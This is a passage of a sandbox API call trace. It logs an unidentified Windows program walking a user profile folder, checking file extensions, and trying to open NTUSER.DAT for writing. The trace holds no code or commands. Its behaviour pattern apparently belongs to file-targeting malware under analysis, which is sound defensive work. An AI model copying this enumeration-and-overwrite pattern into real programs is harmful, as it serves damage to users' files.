Size=0x40) returned 0x2cddd38 [0188.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.783] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0188.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4790 [0188.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0188.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0188.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0188.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4790 | out: hHeap=0x620000) returned 1 [0188.784] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0188.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0188.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.785] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x791af7b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xa0a64910, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xa0a64910, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0188.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0188.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x46) returned 0x2ccbaa8 [0188.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0188.785] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\NTUSER.DAT") returned=".DAT" [0188.785] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\NTUSER.DAT" (normalized: "c:\\users\\keecfmwgj\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccbaa8 | out: hHeap=0x620000) returned 1 [0188.786] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9f7ae870, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0188.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0188.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0188.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0188.786] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\ntuser.dat.LOG1") returned=".LOG1" [0188.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0188.787] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79bf3690, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0188.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0188.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0188.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0188.787] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\ntuser.dat.LOG2") returned=".LOG2" [0188.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0188.788] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0188.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0188.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0188.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0188.789] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0188.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0188.789] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79c197f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79c197f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0188.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0188.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x661a58 [0188.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0188.790] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0188.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x661a58 | out: hHeap=0x620000) returned 1 [0188.790] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79c3f950, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79c3f950, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0188.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0188.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x661a58 [0188.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0188.790] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0188.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x661a58 | out: hHeap=0x620000) returned 1 [0188.791] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x7945d070, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7945d070, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0188.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0188.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x46) returned 0x2ccbaa8 [0188.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0188.791] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\ntuser.ini") returned=".ini" [0188.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccbaa8 | out: hHeap=0x620000) returned 1 [0188.791] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0188.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x214) returned 0x2e912b0 [0188.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0188.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0188.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94a80 [0188.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94be8 [0188.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94c30 [0188.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94c78 [0188.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94cc0 [0188.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94d08 [0188.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94d50 [0188.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94d98 [0188.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccae48 [0188.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94de0 [0188.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0188.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0188.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0188.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddea0 | out: hHeap=0x620000) returned 1 [0188.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddee8 | out: hHeap=0x620000) returned 1 [0188.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94ac8 | out: hHeap=0x620000) returned 1 [0188.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94b10 | out: hHeap=0x620000) returned 1 [0188.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94b58 | out: hHeap=0x620000) returned 1 [0188.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94ba0 | out: hHeap=0x620000) returned 1 [0188.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0188.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0188.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0188.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0188.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7a838 | out: hHeap=0x620000) returned 1 [0188.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0188.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.797] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9867c5b0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9867c5b0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0188.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0188.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.798] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0188.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0188.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.798] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0188.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddea0 [0188.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.799] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0188.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0188.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.800] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0188.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0188.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.801] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x310) returned 0x2d08630 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94ba0 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94b58 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94b10 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94ac8 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94e28 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94e70 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94eb8 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94f00 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94f48 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaf50 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94f90 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94fd8 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95020 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95068 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e950b0 [0188.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e950f8 [0188.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95140 [0188.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0188.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0188.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94a80 | out: hHeap=0x620000) returned 1 [0188.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94be8 | out: hHeap=0x620000) returned 1 [0188.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94c30 | out: hHeap=0x620000) returned 1 [0188.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94c78 | out: hHeap=0x620000) returned 1 [0188.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94cc0 | out: hHeap=0x620000) returned 1 [0188.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94d08 | out: hHeap=0x620000) returned 1 [0188.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94d50 | out: hHeap=0x620000) returned 1 [0188.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94d98 | out: hHeap=0x620000) returned 1 [0188.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccae48 | out: hHeap=0x620000) returned 1 [0188.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94de0 | out: hHeap=0x620000) returned 1 [0188.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0188.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0188.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddee8 | out: hHeap=0x620000) returned 1 [0188.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddea0 | out: hHeap=0x620000) returned 1 [0188.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0188.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0188.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0188.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0188.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.810] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0188.810] RtlAllocateHeap 